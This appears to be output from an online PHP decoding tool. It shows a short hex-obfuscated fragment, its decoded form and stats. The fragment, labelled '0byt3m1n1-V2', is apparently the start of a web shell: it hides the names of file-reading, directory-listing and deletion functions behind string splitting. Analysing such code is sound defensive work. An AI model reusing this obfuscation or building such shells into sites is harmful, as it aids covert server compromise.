Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$sname = "\x30\x62\x79\x74\x33\x6d\x31\x6e\x31" . "-V2"; $__gcdir = "\x67" . "\..

Decoded Output download

<?  $sname       = "0byt3m1n1" . "-V2"; 
$__gcdir     = "g" . "etcwd"; 
$__fgetcon7s = "file" . "_get_contents"; 
$__scdir     = "s" . "candi" . "r"; 
$rm__dir     = "rmd" . "ir"; 
$un__link    = "un" . "link"; 
 ?>

Did this file decode correctly?

Original Code

$sname       = "\x30\x62\x79\x74\x33\x6d\x31\x6e\x31" . "-V2";
$__gcdir     = "\x67" . "\x65\x74\x63\x77\x64";
$__fgetcon7s = "\x66\x69\x6c\x65" . "\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
$__scdir     = "s" . "\x63\x61\x6e\x64\x69" . "r";
$rm__dir     = "\x72\x6d\x64" . "ir";
$un__link    = "\x75\x6e" . "\x6c\x69\x6e\x6b";

Function Calls

None

Variables

$sname 0byt3m1n1-V2
$__gcdir getcwd
$__scdir scandir
$rm__dir rmdir
$un__link unlink
$__fgetcon7s file_get_contents

Stats

MD5 b896f3796646c0eb0927dd932629be09
Eval Count 0
Decode Time 64 ms